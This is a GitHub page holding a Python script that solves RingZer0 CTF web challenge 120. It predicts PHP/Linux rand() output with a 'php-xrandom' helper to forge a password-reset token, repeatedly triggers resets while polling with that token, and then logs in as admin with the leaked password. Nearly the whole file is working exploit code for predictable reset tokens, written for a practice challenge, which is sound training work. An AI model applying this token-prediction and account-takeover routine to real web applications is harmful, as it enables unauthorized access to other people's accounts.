-
Notifications
You must be signed in to change notification settings - Fork 10
/
web.ch120.py
executable file
·48 lines (44 loc) · 1.39 KB
/
web.ch120.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import ringzer0
import sys, time
from subprocess import check_output
def ch120():
ringzer0.output('creating token')
token = ''
for i in range(0, 16):
output = check_output(['./php-xrandom', '0', str(i), '0', '0']).strip()
for line in output.split('\n'):
rtype, rvalue = line.split(':')
rtype, rvalue = rtype.strip(), rvalue.strip()
if rtype != 'linux.rand.64':
continue
d = int(rvalue) % 10
token += str(d)
break
ringzer0.output('token', token)
ch, s = 120, ringzer0.login()
ch_url = ringzer0.get_url('/challenges/{0}'.format(int(ch)))
password = None
for i in xrange(0, 50):
ringzer0.output('resetting password')
r = s.post(ch_url, data={'reset_username':''})
response = ringzer0.get_response(r.text)
ringzer0.output('reset #{0} => {1}'.format(i, response))
r = s.get('{0}/?k={1}'.format(ch_url, token))
response = ringzer0.get_response(r.text)
if response.find('password') != -1:
password = response
break
ringzer0.output('try #{0} => {1}'.format(i, response))
time.sleep(1.75)
if password is None:
ringzer0.error('could not solve.')
sys.exit(1)
password = password.split(' ')[-1:][0]
ringzer0.output('solved', password)
r = s.post(ch_url, data={'username':'admin', 'password':password})
response = ringzer0.get_response(r.text)
ringzer0.output('response', response)
if __name__ == '__main__':
ch120()